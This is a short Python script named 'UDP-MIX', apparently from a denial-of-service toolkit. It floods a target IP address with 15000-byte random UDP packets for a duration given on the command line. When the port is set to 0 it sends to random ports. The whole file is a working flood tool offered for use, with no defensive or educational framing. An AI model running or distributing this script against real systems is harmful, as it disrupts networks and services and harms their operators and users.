#!/usr/bin/python
# LegacyServices On Top
# Runnin Shii

import socket,random,sys,time



if len(sys.argv)==1:
    print('')
    print(' UDP-MIX')
    print('')
    sys.exit('Syntax: ./udpmix 127.0.0.1 80 300')



def udp_socket_extention():

    port = int(sys.argv[2])

    randport=(True,False)[port==0]

    ip = sys.argv[1]

    dur = int(sys.argv[3])

    clock=(lambda:0,time.clock)[dur>0]

    duration=(1,(clock()+dur))[dur>0]
	
    print('')
    print('\033[91m UDP-MIX')
    print('\033[0m')
	
	
    sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)

    bytes=random._urandom(15000)

    while True:

        port=(random.randint(1,15000000),port)[randport]

        if clock()<duration:

            sock.sendto(bytes,(ip,port))

        else:

            break

    

udp_socket_extention()
